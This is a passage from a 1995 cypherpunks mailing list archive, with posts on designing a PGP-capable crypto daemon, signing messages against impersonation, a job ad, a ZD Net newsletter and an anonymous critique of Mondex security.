issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
tend to attract far more attention than real crypto work. I want a
forum for, and just for, cypherpunks who write code. If I had just a
smidgen more free time (as if), I'd be trying to start one
myself. Anyone else?

Raph





From dl at hplyot.obspm.fr  Sat Nov 18 01:06:57 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Sat, 18 Nov 1995 17:06:57 +0800
Subject: Ecash account
In-Reply-To: <199511170930.CAA00682@wero.byu.edu>
Message-ID: <9511171032.AA10628@hplyot.obspm.fr>


don at cs.byu.edu writes:
 > So who here is going to use their ecash account to set up a money
 > lau^H^H^Hexchange service?

I have one, sort of, the rates are quite high though, It's my casino, 
( http://www.box.eu.org/~dl/inc/play.shtml )
[If you play an infinite number of times, you will have statistically
received 89% of what you've bet. So Its an 11% fee exchange service
somehow :-)]

For obvious reasons, it works only with CyberBucks though...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Greenpeace Ortega Marxist Qaddafi Chirac Soviet domestic disruption





From drcharpe at hamlet.uncg.edu  Sat Nov 18 02:59:41 1995
From: drcharpe at hamlet.uncg.edu (Daniel 'genius' Charpentier)
Date: Sat, 18 Nov 1995 18:59:41 +0800
Subject: WRITTEN CODE
Message-ID: <Pine.SOL.3.91.951118052646.7857B-100000@hamlet>




  In Raph Levien's

       Subject : Design proposal : crypto-capable generic interface

he mentioned his desire to see more cryptographic program code and
I didn't want to see this initiative die.  I am a new commer to
cryptography and I know I shouldn't be posting yet but that is
what I thought cypherpunk postings was supposed to be in the first
place ( program code, protocols, and algorithms ).  Please don't
flame me to badly for this message.  I am doing everything I am
supposed to before posting ( reading the FAQ's, the entire
cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )
but I could not let this slip by.  Let's talk more about the
cryptographic algorithms, program code, and chips than
politics.  


                     I hope this did not upset to many people






From adam at lighthouse.homeport.org  Sat Nov 18 07:02:54 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Sat, 18 Nov 1995 23:02:54 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511180842.AAA06560@infinity.c2.org>
Message-ID: <199511181441.JAA02040@homeport.org>


Raph Levien wrote:

|    I propose that the new interface lives as a sort of daemon, rather
| than a static collection of command line script pieces. A reasonable
| way for applications to talk to the daemon would be Unix domain
| sockets, or whatever the equivalent is on Mac and Windows
| platforms. There should be a simple protocol for automatically
| starting up a daemon if there isn't one already running.

	A daemon per user, or per machine?  Either way, I think you
run into problems on a big multi-user machine.  (Either its an extra
process or two per person, or its a great target for attack &
subversion.

	Its an interesting proposal, but let me ask you this--Why is
it better than a libpgp (or pgp.dll) that offers a variety of services
to programs at multiple levels (ie, offers full one call RSA/IDEA
encryption and compression, as well as ascii armoring, or offers each
of those as a seperate function.




-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From adam at lighthouse.homeport.org  Sat Nov 18 07:05:22 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Sat, 18 Nov 1995 23:05:22 +0800
Subject: CSE gets flak on TV
In-Reply-To: <199511180300.TAA16642@jobe.shell.portal.com>
Message-ID: <199511181446.JAA02056@homeport.org>


If you want us to believe you didn't write it, publish a key, and
consistently use it to sign messages.  Incidentally, this also lets us
reliably filter you. :)


| Alice here (the real one) ...
| 
| I think that this "writer" who felt that it was desirable to attach MY
| name to this drivel deserves a good flogging. 


Adam
(Or someone cleverly forging posts in my name.)

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From s1113645 at tesla.cc.uottawa.ca  Sat Nov 18 07:56:33 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sat, 18 Nov 1995 23:56:33 +0800
Subject: WRITTEN CODE
In-Reply-To: <Pine.SOL.3.91.951118052646.7857B-100000@hamlet>
Message-ID: <Pine.3.89.9511181002.A4814-0100000@tesla.cc.uottawa.ca>




On Sat, 18 Nov 1995, Daniel 'genius' Charpentier wrote:

> he mentioned his desire to see more cryptographic program code and
> I didn't want to see this initiative die.  I am a new commer to
> cryptography and I know I shouldn't be posting yet but that is

Don't be shy: POST! If you've got good coding ideas, then by all
means we want to hear you. If you've got lousy ideas but good intentions,
the fastest way on the net to get corrected is to post a mistake :-) .
Nobody will flame you for that, so don't be so touchy.

> what I thought cypherpunk postings was supposed to be in the first
> cryptographic algorithms, program code, and chips than
> politics.  

Some of us codewriters are far lazier than others on the list, 
politicical discussion seems to take less effort and is the lowest common
denominator (too bad, but then I'm guilty; snore...).

>                      I hope this did not upset to many people

Hardly. Don't worry about it, besides, killfiles exist. I agree  
wholeheartedly too, I'd love to see more crypto code and protocol discussion.
I must point out though, that the quality you get is related to the 
quality you give, if you post crypto code/protocol material (I'm too lazy 
for that, right now...), that's what the debate will shift to.
Kind of like "Build it and they will come." (Field of Dreams?).

Curious, where is uncg.edu? Your French name doesn't make me think you're 
in the States (as an .edu address might suggest, but then not necessarily 
either). (univ of Calgary?)

Bonne fin de semaine.





From aba at atlas.ex.ac.uk  Sat Nov 18 08:09:02 1995
From: aba at atlas.ex.ac.uk (aba at atlas.ex.ac.uk)
Date: Sun, 19 Nov 1995 00:09:02 +0800
Subject: protecting against impersonation (was: CANADIAN PRESS REPORTS)
Message-ID: <29172.9511181558@exe.dcs.exeter.ac.uk>



anonymous writes:
> I still feel such a sense of violation with what LD did, such an
> utter sense of helplessness at the character assassination I've
> suffered at his hands, 

So use PGP, sign your messages.  Simple solution.

> that I feel that I must take some token action to "set the record
> straight".  Something which clears my name.

This post wasn't signed off, but I presume you are "Alice d'nonymous",
it would help lots if you could get yourself an account with a nym
server, such as alpha at c2.org.  That would have the advantages that
your email address would be recognizable, and that people could reply
to you if they wanted to.

If having a working reply address bothers you, well at least sign your
posts, if you're concerned about a persistant identity, the tools are
available to do it.  Complaining about things which have simple
technological solutions won't get you much sympathy.

Adam






From sandfort at crl.com  Sat Nov 18 08:25:08 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Sun, 19 Nov 1995 00:25:08 +0800
Subject: Give us your wired, your poor, your HTML hacker, yearning to web , freely (fwd)
Message-ID: <Pine.SUN.3.91.951118080033.10982A-100000@crl12.crl.com>


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

S'punks,

Anyone need a job in the Bay Area?  I think a Cypherpunk would be
ideal for this job.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
Date: 17 Nov 95 17:29:42 
From: Steve Gibson <Steve_Gibson at bionomics.org>
To: Friends of Bionomics <Friends_of_Bionomics at notes.worldcom.com>
Subject: Give us your wired, your poor, your HTML hacker, yearning to web freely

Dear Friends,

We need help.  

We need a combination web-cultivator, researcher, editor, conference assistant 
and Notes/Mac wizard.  In sum, a typical enterpreneurial utility infielder.  

Finding people who comfortably straddle the worlds of public policy and high 
technology can be tricky.  We look to you, as someone familiar with The 
Bionomics Institute, for assistance in this key search.  (After all, this one 
hire represents a 33% increase in our staff.) 

If you know of such a person, please get the following information to them, or 
get them in touch with us.

Thanks,
Steve


* * * * * * * * * * * * * * * * * * * * * * * * *
JOB OPENING
* * * * * * * * * * * * * * * * * * * * * * * * *

WHO WE ARE
The Bionomics Insitute is non-profit educational foundation (aka Think Tank) 
dedicated to replacing the conventional mechanistic model of the economy with a 
living, ecosystem one, as described in  Michael Rothschild's book <Bionomics: 
Economy as Ecosystem>.

QUALIFICATIONS
Must be comfortable (1) all over the WWW, and inside the HTML of our web site, 
and (2) researching economics, technology, history, biology, public policy and 
??? using libraries, on-line data sources, phone calls and brainpower, and 3) 
familiar with free-market thinking.

JOB DESCRIPTION
(1) Nurture Institute web site.  (2) Provide primary research support for 
free-market think tank/high-tech columnist.  (3) Maintain research library.  
(4) Assist in general operations of Institute, including conferences, etc.  (5) 
etc. (6) see 5.

ORGANIZATIONAL CULTURE
Informal but intense work environment, self-starters only.  Teamwork and 
communication trite but very necessary.  Technical knowledge must be matched 
with broad interests and strong English skills.  Small staff, medium salary, 
large hours.

IF YOU MADE IT THIS FAR
Do your research on Bionomics (www.bionomics.org would be a good place to 
start), then email resume to Research at bionomics.org.

(November 17, 1995)

Steve Gibson, Executive Director, The Bionomics Institute, 415/454-1000, 
www.bionomics.org






From dlv at bwalk.dm.com  Sat Nov 18 08:54:01 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 00:54:01 +0800
Subject: WRITTEN CODE
In-Reply-To: <Pine.3.89.9511181002.A4814-0100000@tesla.cc.uottawa.ca>
Message-ID: <DHRReD28w165w@bwalk.dm.com>


s1113645 at tesla.cc.uottawa.ca writes:
> On Sat, 18 Nov 1995, Daniel 'genius' Charpentier wrote:
>
> > he mentioned his desire to see more cryptographic program code and
> > I didn't want to see this initiative die.  I am a new commer to
> > cryptography and I know I shouldn't be posting yet but that is
>
> Don't be shy: POST! If you've got good coding ideas, then by all
> means we want to hear you. If you've got lousy ideas but good intentions,

Amen. If you have something crypto-relevant to post, please do. As the amount
of noise on this list rises, the meaningful discussion goes away. Please help
reverse this trend.

> the fastest way on the net to get corrected is to post a mistake :-) .
> Nobody will flame you for that, so don't be so touchy.

Or if some anal-retentive jerk flames you, ignore him. Even if you make a naive
mistake in your post, and someone corrects it, both you and probably other
readers of this list will learn from it.

> Bonne fin de semaine.

Curious how in qc they say 'fin the semaine' while in France proper everybody
says 'weekend'.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From dlv at bwalk.dm.com  Sat Nov 18 08:54:16 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 00:54:16 +0800
Subject: Oracle's "internet terminal"
Message-ID: <TRRReD29w165w@bwalk.dm.com>


The recent issue of _Computer Reseller News_ has a couple of items on the
"internet terminal" being readied by Oracle. I'll quote a couple of
crypto-relevant excerpts:

1. Interview with Larry Ellison (Oracle Corp's Chairman/CEO)

Q. How far along are you in the development of the $500 Internet Network
Terminal?

A. We'll be delivering the prototype machines this year with full production in
the third quarter next year.

...

Q. Will you release Application Programing Interfaces for the Oracle browser
and server?

A. We will use industry-standard APIs that are accepted by everybody, not
Microsoft-proposed APIs.

...

Q. What differentiates the Oracle Web products from competitive offerings in
terms of pricing and technology?

A. There will be standard Web payment schemes. We'll use them, as will
everybody else. We won't differentiate ourselves on basic payment schemes. The
thing that will differentiate us is security protocols, the ability to use text
processing, database processing, video processing, our video server technology
and our powerful client.


2. Ellison's field of dreams - $500 PC (by Ken Yamada)

... Oracle's chairman and chief executive, Lawrence Ellison, previewing his
latest futuristic vision at a trade show last month in Geneva, said Oracle is
developing the computer and that it will be shown early next year. The desktop
version of the new system, called a "network computer" and referred to as an
"NC" rather than a PC, is expected to sell for about $500 and will use Internet
servers to do the bulk of its computing. Basic hardware will include an
inexpensive microprocessor, a small amount of memory, a monitor and a keyboard,
but the device will lack storage and software. [I guess, they mean no permanent
storage or software other than the browser in ROM. No remembered state, no
viruses... -DV]

... The Redwood Shores, Calif., company is developing the computer's operating
system and technical design, but the unit will be produces by hardware
manufacturers, said Farzad Dibachi, an Oracle senior vice president. While
Dibachi would not name specific manufacturers, he explained that Oracle's
participation in the device's technical development was similar to the role it
played in developing a digital television set-top box with Apple Computer,
which produced the box's hardware. ... Oracle plans to sell software that turns
World Wide Web sites essentially into central processing units for the new
computers. ...

"If computing is to go to the masses and we're doing electronic commerce," said
Dibachi in a telephone interview from Geneva, "you have to have devices that
are simpler."

Oracle's Laursen said he expectes that eventually many different companies will
manufacture the devices, which he described as an entire line of products
encompassing two-way pagers, intelligent telephones, mobile computers, desktop
systems and television set-top boxes. Each of these devices would rely on the
Internet to do its core processing work. He said he expected Oracle to develop
as many as 50 working prototypes by early next year.

... Oracle also plans to leverage its wireless communications software products
and give some of the devices wireless capabilities. "We're still trying to
figure out what processor to put in," Laursen said. Under consideration are
chips from Mips Technologies and Motorola Inc.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From tcmay at got.net  Sat Nov 18 08:59:46 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 19 Nov 1995 00:59:46 +0800
Subject: WRITTEN CODE
Message-ID: <acd34c9c010210049064@[205.199.118.202]>


At 10:51 AM 11/18/95, Daniel 'genius' Charpentier wrote:

>I didn't want to see this initiative die.  I am a new commer to
>cryptography and I know I shouldn't be posting yet but that is
>what I thought cypherpunk postings was supposed to be in the first
>place ( program code, protocols, and algorithms ).  Please don't
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The list is about several things, some of which overlap the topics
routinely discussed in sci.crypt and sci.crypt.research.

Algorithms, code, etc. _does_ get discussed a lot, as you'll surely see as
you peruse the archives. Volume-wise, it is a drop in the bucket. But this
is not surprising, as primarily mathematical questions and answers tend to
be brief. (You'll see this in the many one-line answwers to questions about
cryptographic algorithms....)

Also, technical questions tend to have precise answers, usually with
answers in the various crypto texts and proceedings of the Crypto and
EuroCrypt conferences. And technical questions which _don't_ have simple
answers in the texts tend of course to be _research_ questions, and the
dynamics mitigate against lively discussion until some progress is made.

The social, political, and economic aspects are seldom discussed adequately
elsewhere, and one thing the Cypherpunks group has really led in is the
discussion of digital money, anonymous systems, pseudonyms, reputation,
markets, and a host of other such topics. These topics can border on pure
politics if people are not careful, but are generally close to the topics
discussed at the first meeting over three years ago, before there was even
a mailing list.


>flame me to badly for this message.  I am doing everything I am
>supposed to before posting ( reading the FAQ's, the entire
>cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )
>but I could not let this slip by.  Let's talk more about the
>cryptographic algorithms, program code, and chips than
>politics.

So, go ahead and talk. I mean this seriously, not sarcastically.

No one will chastise you or anyone else for discussing technical
cryptography. There are obviously folks interested in this. Experts, even.
Published experts, even.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tao at presence.lglobal.com  Sat Nov 18 09:06:11 1995
From: tao at presence.lglobal.com (The Anarchives)
Date: Sun, 19 Nov 1995 01:06:11 +0800
Subject: pgp on bsdi 2.0
Message-ID: <Pine.BSD/.3.91.951118165249.10950A-100000@presence.lglobal.com>


Hi, I'm having trouble getting pgp compiled on bsdi 2.0.

Can someone who has successfully done this please email me with some help :)

thanx

	http://www.lglobal.com/TAO/
         ___         ___            ___
        /  /\       /  /\          /  /\
       /  /:/      /  /::\        /  /::\
     /  /:/       /  /:/\:\      /  /:/\:\
    /  /::\      /  /:/ /::\    /  /:/  \:\   
   /__/:/\:\    /__/:/ /:/\:\  /__/:/ \__\:\     
   \__\/  \:\   \  \:\/:/__\/  \  \:\ /  /:/ 
        \  \:\   \  \::/        \  \:\  /:/
         \  \:\   \  \:\         \  \:\/:/
          \  \:\   \  \:\         \  \::/
	   \__\/    \__\/          \__\/






From wwwziff at internet.com  Sat Nov 18 10:17:22 1995
From: wwwziff at internet.com (ZD Net / World Wide Web Edition)
Date: Sun, 19 Nov 1995 02:17:22 +0800
Subject: ZD Net Update v.1 #2
Message-ID: <199511181755.MAA22495@yipee.internet.com>


__________________________________ZD Net Update_______________________________
v. 1 #2                                                               11-13-95

Welcome to ZD Net Update, the free E-mail newsletter created especially for
registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition. 
ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting
developments on ZD Net.

In this issue:

> ZD NET COMDEX/FALL '95 COVERAGE KICKS OFF
> ZIFF-DAVIS PREMIERES ZD INTERNET LIFE ON THE WORLD WIDE WEB
> TRUE INTERACTIVE REALITY ARRIVES ON ZD NET
> ANNOUNCING SNAP SOLUTIONS TO COMPLEX PROBLEMS
> MEASURE THE HEALTH OF THE NET WITH THE INTERNET INDEX

*     *     *     *     *     *     *     *     *     *

ZD NET COMDEX/FALL '95 COVERAGE KICKS OFF

Comdex/Fall: It's been called the Greatest Show on Earth, and for good reason.
All this week the ZD Net Special Report

      http://www.zdnet.com/~zdi/comdex/filters/main.html

will provide continuous updates from the trade show, complete with daily news
updates, expert commentary, and Live Chats. Follow PC Magazine's Technical
Excellence Awards, cybercast as a virtual 3D world. Get the skinny from PC 
Week's
Spencer F. Katt party. And learn all about the new products that have attendees
buzzing. For all the sights and sounds of the show, ZD Net is the place to be.


*     *     *     *     *     *     *     *     *     *

ZIFF-DAVIS PREMIERES ZD INTERNET LIFE ON THE WORLD WIDE WEB

This month marks the debut of ZD Internet Life (http://www.zdnet.com/zdil/), 
the first interactive magazine designed from the ground up around a Web site. 

Combining a magazine, a Web site, and a CD ROM, ZD Internet Life is focused
on using the Internet for fun, profit, and personal growth. The editorial
staff is headed by Bill Machrone, ZD Internet Life's Editor-in-Chief,
Ziff-Davis's Vice President of Technology, and one of computer journalism's
most respected stars. It also includes Web doyenne Angela Gunn and Associate
Editor Lisa Holzer.

Together with expert reviewers, ZD Internet Life's staff picks "The Best"
sites and provides a top-to-bottom listing of "The Rest" of the sites that
address a given topic under the categories of fun, profit, and personal
growth. Readers who visit the Web sites will be able to add their opinions
to an online database of site reviews. 

The content of the Web site is a superset of what will appear in the magazine
and on the CD ROM. In the words of the ZD Internet Life editors, "ZD Internet
Life is a Web site with an accompanying magazine. In other words, what you see
right here is a lot like what you'll see on your local  newsstand three months
from now. Make sense? Welcome to the future of publishing."

*     *     *     *     *     *     *     *     *     *

TRUE INTERACTIVE REALITY ARRIVES ON ZD NET

Blast off into the future with ZD3D (http://www.zdnet.com/~zdi/vrml),
a new interactive virtual reality area on ZD Net. Designed to serve as the 
preeminent source for interactive virtual reality on the Internet, ZD3D 
provides users with a rich and evolving virtual reality site, direct access
to other 3D Web sites, and a wealth of news, events, articles, and commentaries
focusing on virtual reality.  

ZD3D's design is based on Virtual Reality Modeling Language (VRML), a technology
standard created by Tony Parisi and Mark Pesce that makes 3D environments on the
Internet accessible through a standard PC. Users will feel as if they're 
actually
strolling around 3D Web sites at will, obtaining information in the form of 
graphical,
three-dimensional metaphors. In building the area, ZDI obtained the support of
both Pesce and Parisi, who will contribute exclusive VRML commentaries and 
updates 
to ZD3D. In addition, Parisi helped ZDI build the ZD3D site through Intervista 
Software, his VRML technology and consulting firm.  

When ZD Net users click on ZD3D, they're given several options, including hot
news; Parisi and Pesce's commentaries; the WorldView VRML browser from 
Intervista
Software and other VRML browsers; and Terminal Reality, ZD3D's interactive 
virtual reality experience. The WorldView browser can be downloaded for free,
enabling users to access the Terminal Reality world and launch to the other 
3D Web sites available there.  

Once in, users navigate through a virtual airport, complete with departure 
gates to other interactive 3D Web sites, a central newsstand, and 
advertisements on walls and vehicles. Users are transported to 3D sites via a 
wide range of vehicles, including rockets, jets, ships, buses, and trains. Over 
the next six to nine months, ZD3D will include 3D chat, animated objects, and 
3D sound.

Experience the brave new world of virtual reality on the Web. Experience ZD3D 
today!

*     *     *     *     *     *     *     *     *     *

ANNOUNCING SNAP SOLUTIONS TO COMPLEX PROBLEMS

Just don't have enough time to design your own home page? Relax, help is on the 
way.  

The ZD Net How To Design Your Own Home Page SnapSolution 

     http://www.zdnet.com/~zdi/software/snapsol/snapmain.html

provides all the knowledge you need to stake a claim on the World Wide Web and 
to
put up your own site for the whole world to see. This informative, entertaining
guide offers a step-by-step tutorial, using programs chosen from the thousands 
of files in ZD Net's shareware libraries as well as colorful screen shots 
illustrating
the key points. 

SnapSolutions offer hands-on, step-by-step advice on how to make your life more
productive using shareware. Appearing each month, SnapSolutions will focus on 
both
computing and non-computing goals alike. The next two SnapSolutions will help 
you create 
our own screen saver and holiday greeting cards.

SnapSolutions: shareware at its best.

*     *     *     *     *     *     *     *     *     *

MEASURE THE HEALTH OF THE NET WITH THE INTERNET INDEX

Got an extra couple of grand burning a hole in your pocket? Maybe it's time you 
invested in the Internet.

Introducing the Inter at ctive Week Internet Index, or @Net Index,

     http://www.hydra.com/interactive_week.html

a collection of 37 Internet-related companies that give investors a formal 
measure
of the performance of the emerging Internet industry. 

The @Net Index, which trades under the symbol IIX, was developed by Inter at ctive
Week and the American Stock Exchange to better measure the performance of 
businesses
associated with the Internet. It does this by focusing on select Internet
service providers, commercial online service companies, Internet tool companies,
multimedia publishers, and networking companies. The @Net Index also includes
providers of technology expected to shape the future of the Internet, such as 
videoconferencing and interactive television.

The @Net Index is a bona fide investment vehicle; options contracts on it will
trade every business day on the floor of the American Stock Exchange. Investors 
will
trade options based on the direction the index takes, over time. Initial 
expiration
months are November and December 1995; January, April, and July 1996. 

The @Net Index closed Oct. 17 at 215.04, up 52 percent since the beginning of 
1995.
The Standard & Poor's 500 was up 28 percent for the same period. 

For more information about investing in the Index, call (800) THE-AMEX or check
out the AMEX's Web site at http://www.amex.com. The Inter at ctive Week Web site 
(http://www.zdnet.com/~intweek) provides trading updates.

*     *     *     *     *     *     *     *     *     *

ZD Net Update is the official newsletter of ZD Net/World Wide Web Edition. It 
is 
compiled by Tom Schmidt (tom_schmidt at zd.com). Feel free to respond with any 
news,
notes, comments, or suggestions. To unsubscribe to ZD Net Update, point your 
browser
to:

     http://www.zdnet.com/cgi-bin/ziffmail.pl/update

and select 

     "Unsubscribe to ZD Net Update."





From attila at primenet.com  Sat Nov 18 10:26:35 1995
From: attila at primenet.com (attila)
Date: Sun, 19 Nov 1995 02:26:35 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181441.JAA02040@homeport.org>
Message-ID: <Pine.BSD.3.91.951118163828.463A-100000@usr3.primenet.com>


On Sat, 18 Nov 1995, Adam Shostack wrote:

> Raph Levien wrote:
> 
> |    I propose that the new interface lives as a sort of daemon, rather
	[snip]
> | 
> 
> 	A daemon per user, or per machine?  Either way, I think you
> run into problems on a big multi-user machine.  (Either its an extra
> process or two per person, or its a great target for attack &
> subversion.
> 
        _anything_ that has open access on a piece of hardware is a point
     of intrustion --sendmail for instance, or open password files, etc. 
     the issue is trading off risks to _maximize_ security and 
     impenatrable access.

        even assuming we were to post 100% of the source code, a
     translation daemon is a _translation_ model --even if it is capable
     of translating pgp, garbage in equals nothing out...

        one of the biggest problems with _any_ crypto system, and pgp is 
     no exception, is tmp files, followed closely by insecure memory.
     insecure memory is a separate issue, but some of the temporary file
     problems can be relegated to reduced risk by passing the daemon the
     user's preferred location for tmp file --for instance, on any net
     access machine, I globally specify TMP, TEMP, etc to a local tmp
     directory which is at least somewhat safer than public tmp files.
     obviously, you expect the daemon to wipe clean each memory block 
     before it free()s it --I's sure we all have routines handy for that.

        presuming the daemon is constructed so it can only respond to its
     current process owner, this leaves the security problem of swapping 
     in a daemon which also responds to an interloper --and this same risk
     applies to a libppg or a .dll file (more so to a .dll file) to an 
     even greater degree.  However, if a daemon is swapped, the system has
     a more _serious_ problem with the system administrator, not the
     daemon.

        if the IPC strings are intercepted in the daemon initializtion, 
     again we have a basic hardware and system security problem.

     Even If Ralph Levian believes daemons are serious risk problems 
     (which they can be if not properly implemented), I do not agree that 
     the libppg() or .dll offer anything additional.  I dont presume to 
     believe that anything is safe anyway, just safer than the alter-
     native.

        NB:  _nothing_ should ever be assumed secure! 

             assumption is fuckup's mother.  

        one must hope to have considered every possible line of attack, 
     and a few which have not been conceived, which goes back to our
     cypherpunk "credo" which says that private standards are not safe
     --let's all have at it --even if we break it, there probably is a way
     to block the attack, we just did not block it or consider it the
     first time,
     
        I have been playing with all three approaches, and I keep going 
     back to the daemon despite the fact it is not portable to the brain
     dead. 

             I don't know if W95 permits daemons as I have ignored MS
             for a number of years --if I can not run as many processes
             as I want without some MickeySoft program blowing away a
             day's work.... I prsume NT will run 'em, and maybe the 
             next release of NT will be more useable, more secure, and
             more stable.

        Since pgp() has been pulled from crypto10, I need to modularize 
     pgp to a pgp() and include the relevant goodies such as MIME and its 
     variations.  And, of course, we need all the "we do it here" types to
     buy into a standard interface.

        And, to add fuel:  the module needs the ability to encode and 
     place clear text into a MIME format specified by the calling program.

> 	Its an interesting proposal, but let me ask you this--Why is
> it better than a libpgp (or pgp.dll) that offers a variety of services
> to programs at multiple levels (ie, offers full one call RSA/IDEA
> encryption and compression, as well as ascii armoring, or offers each
> of those as a seperate function.
> 
	not necessarily better. but a valid approach IMHO.  I for one 
     think it would be easy enough to sell IAPs on a daemon.

> 
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 






From sameer at c2.org  Sat Nov 18 10:33:36 1995
From: sameer at c2.org (sameer)
Date: Sun, 19 Nov 1995 02:33:36 +0800
Subject: protecting against impersonation (was: CANADIAN PRESS REPORTS)
In-Reply-To: <29172.9511181558@exe.dcs.exeter.ac.uk>
Message-ID: <199511181816.KAA18622@infinity.c2.org>


> 
> This post wasn't signed off, but I presume you are "Alice d'nonymous",
> it would help lots if you could get yourself an account with a nym
> server, such as alpha at c2.org.  That would have the advantages that
> your email address would be recognizable, and that people could reply
> to you if they wanted to.

	it's alpha.c2.org, not alpha at c2.org, btw.

	The added benefit of this is that people could killfile you easily.


> 
> If having a working reply address bothers you, well at least sign your
> posts, if you're concerned about a persistant identity, the tools are
> available to do it.  Complaining about things which have simple
> technological solutions won't get you much sympathy.
> 
> Adam
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From raph at c2.org  Sat Nov 18 11:14:13 1995
From: raph at c2.org (Raph Levien)
Date: Sun, 19 Nov 1995 03:14:13 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181441.JAA02040@homeport.org>
Message-ID: <199511181856.KAA24071@infinity.c2.org>


Adam Shostack wrote:
> A daemon per user, or per machine? Either way, I think you
> run into problems on a big multi-user machine. (Either its an extra
> process or two per person, or its a great target for attack &
> subversion.

One per user. I'm thinking that, most of the time, the daemon process
would only last as long as the application.

It is certainly true that if there were to be one daemon per machine,
the security requirements would be a lot greater, as it would no
longer be possible to rely on the operating system to get the file
permissions right, etc. On the other hand, the daemon process better
be done right, or your're in trouble anyway.

> Its an interesting proposal, but let me ask you this--Why is
> it better than a libpgp (or pgp.dll) that offers a variety of services
> to programs at multiple levels (ie, offers full one call RSA/IDEA
> encryption and compression, as well as ascii armoring, or offers each
> of those as a seperate function.

   Exportability. There is a general feeling that a mailer program
with specific hooks to libpgp is going to have trouble with
exportablity (and forget about binaries), where a program that
supports a generic interface (the likes of .mailcap) is out of the
NSA's jurisdiction. Of course, this is speculation until we actually
get a ruling, but it sounds plausible enough to me to warrant spending
some time on design and implementation.

   Your question brings up another point: if the daemon process is
going to run as the personal slave of the application, then why not a
dynamic library instead? Two reasons. First, on Unix anyway,
interprocess communication through domain sockets is a more mature,
robust, and portable technology than dynamically linked libraries. On
Windows, it's probably the other way around, and that's worth thinking
about.
   The real reason is, though, that the daemon and application should
naturally be distrustful of each other's address spaces. Can you see
Netscape shipping code that links in a Joe Random dll? Conversely, do
you want your PGP secret data structures sharing an address space with
one of Netscape's beta releases? Using two processes in two address
spaces solves this problem.

   Jeff, if you're reading this, what do you think Netscape's chances
are for supporting such a protocol, assuming of course that there were
nicely implemented daemons, and that the protocol itself was going to
standards track? Is it something you'd be interested in?

Raph





From sandfort at crl.com  Sat Nov 18 11:17:59 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Sun, 19 Nov 1995 03:17:59 +0800
Subject: NOT CRYPTO RELATED (GET OVER IT)
Message-ID: <Pine.SUN.3.91.951117190659.2884A-100000@crl12.crl.com>


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Bay Area S'punks,

Monday, 11/20 5pm Scott Adams, at the Booksmith in San Francisco.
The creator of the  comic starring engineer Dilbert and his dog
Dogbert, will sign his latest book ``It's Obvious You Won't 
Survive by Your Wits Alone.''  1644 Haight St., San Francisco.  
(415) 863-8688.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From anonymous-remailer at shell.portal.com  Sat Nov 18 11:18:08 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 19 Nov 1995 03:18:08 +0800
Subject: No Subject
Message-ID: <199511180330.TAA19479@jobe.shell.portal.com>


Subject:  Shoe-horning Mondex onto the Internet -- still won't fit



There many high barriers to the shoe-horning of Mondex onto the Internet:

+ Was not designed for the Internet, rather for physical portable cards
+ Requires expensive hardware: >$100/board for a PC in start-up quantities 
+ Accoring to inside sources, is vulnerable to MITM between payer and payee
+ According to inside sources, is grossly vulnerable to replay attacks 
(offline multi-spending to different parties)
+ The designers have zero experience and reputation in the cryptographic and
computer security communities
+ None of the Mondex designs have been published or peer reviewed.
+ The protocol cannot be published for security reasons, which means
-- Mondex has security holes
-- Customers who defraud Mondex-using banks have legal deniability in a 
court of law: they can simply request banks to produce the security 
